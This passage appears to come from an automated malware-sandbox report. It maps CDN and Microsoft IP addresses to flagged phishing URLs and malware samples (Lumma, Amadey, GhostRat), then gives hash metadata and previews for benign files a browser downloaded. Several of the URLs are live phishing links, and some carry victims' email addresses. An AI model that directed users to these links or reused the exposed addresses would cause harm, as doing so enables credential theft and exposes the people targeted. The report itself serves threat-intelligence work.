                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    https://juddshaw.acemlnc.com/lt.php?x=3DZy~GDHJXeaEpz5-g1FVxNz1qEjv_Qij~tijXnLI3Ke75_7z0y.yuJz5X6lmNI~juswGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    Sburkholder.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~juswGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    Globalfoundries eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    ooc-g2.tm-4.office.comhttps://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 52.98.242.242
                                                                                                                                                    https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 52.98.32.2
                                                                                                                                                    (Lhambright)VWAV.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 52.98.61.50
                                                                                                                                                    vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 40.99.70.226
                                                                                                                                                    Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 40.99.32.114
                                                                                                                                                    A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 52.98.61.34
                                                                                                                                                    http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 40.99.70.210
                                                                                                                                                    Payment_Failure_Notice_Office365_sdf_[53487].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 52.98.95.210
                                                                                                                                                    https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWEGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 52.98.61.34
                                                                                                                                                    https://simatantincendi.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 40.99.32.114
                                                                                                                                                    sni1gl.wpc.omegacdn.nethttps://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    Sburkholder.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    Globalfoundries eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 152.199.21.175
                                                                                                                                                    code.jquery.comhttps://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.194.137
                                                                                                                                                    https://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.2.137
                                                                                                                                                    Sburkholder.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.130.137
                                                                                                                                                    audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.194.137
                                                                                                                                                    https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.194.137
                                                                                                                                                    https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.194.137
                                                                                                                                                    https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.194.137
                                                                                                                                                    Globalfoundries eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.130.137
                                                                                                                                                    ATT562720.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.66.137
                                                                                                                                                    https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.2.137
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    CLOUDFLARENETUSchu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                    • 172.64.41.3
                                                                                                                                                    https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 172.66.0.227
                                                                                                                                                    https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rarGet hashmaliciousGhostRatBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    https://mitra-led.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    YOUR TV LICENCE STATEMENT.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    CLOUDFLARENETUSchu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                    • 172.64.41.3
                                                                                                                                                    https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 172.66.0.227
                                                                                                                                                    https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rarGet hashmaliciousGhostRatBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    https://mitra-led.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    YOUR TV LICENCE STATEMENT.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    CLOUDFLARENETUSchu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                    • 172.64.41.3
                                                                                                                                                    https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 172.66.0.227
                                                                                                                                                    https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rarGet hashmaliciousGhostRatBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    https://mitra-led.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    YOUR TV LICENCE STATEMENT.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    FASTLYUShttps://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.129.140
                                                                                                                                                    YOUR TV LICENCE STATEMENT.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 151.101.2.132
                                                                                                                                                    https://www.overflix.gay/ksisjepGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.65.44
                                                                                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=evsqlwgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#test@kghm.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.91
                                                                                                                                                    http://plnbl.io/review/VdCYQSoKp54zGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 151.101.195.9
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                                                                                                                    • 185.199.110.133
                                                                                                                                                    https://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.2.137
                                                                                                                                                    Sburkholder.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.66.137
                                                                                                                                                    GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                                                                                                    • 185.199.108.133
                                                                                                                                                    GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                                                                                                    • 185.199.108.133
                                                                                                                                                    No context
                                                                                                                                                    No context
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1435
                                                                                                                                                    Entropy (8bit):7.8613342322590265
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                    MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                    SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                    SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                    SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):3651
                                                                                                                                                    Entropy (8bit):4.094801914706141
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                                                    MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                                                    SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                                                    SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                                                    SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):271751
                                                                                                                                                    Entropy (8bit):5.0685414131801165
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:+tah6/K+TCtlMhTze/RZcYmDizK8dB7alFys/WL/umH4N0IPfKu5AA11vrIY:9pZcYmDcHwFygmY1PfjAA1Br3
                                                                                                                                                    MD5:6A07DA9FAE934BAF3F749E876BBFDD96
                                                                                                                                                    SHA1:46A436EBA01C79ACDB225757ED80BF54BAD6416B
                                                                                                                                                    SHA-256:D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
                                                                                                                                                    SHA-512:E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    URL:https://code.jquery.com/jquery-3.3.1.js
                                                                                                                                                    Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (19015)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19188
                                                                                                                                                    Entropy (8bit):5.212814407014048
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                                    MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                                    SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                                    SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                                    SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (32030)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):86709
                                                                                                                                                    Entropy (8bit):5.367391365596119
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
                                                                                                                                                    MD5:E071ABDA8FE61194711CFC2AB99FE104
                                                                                                                                                    SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                                                                                                                                    SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                                                                                                                                    SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                                                                                                                                    Malicious:false
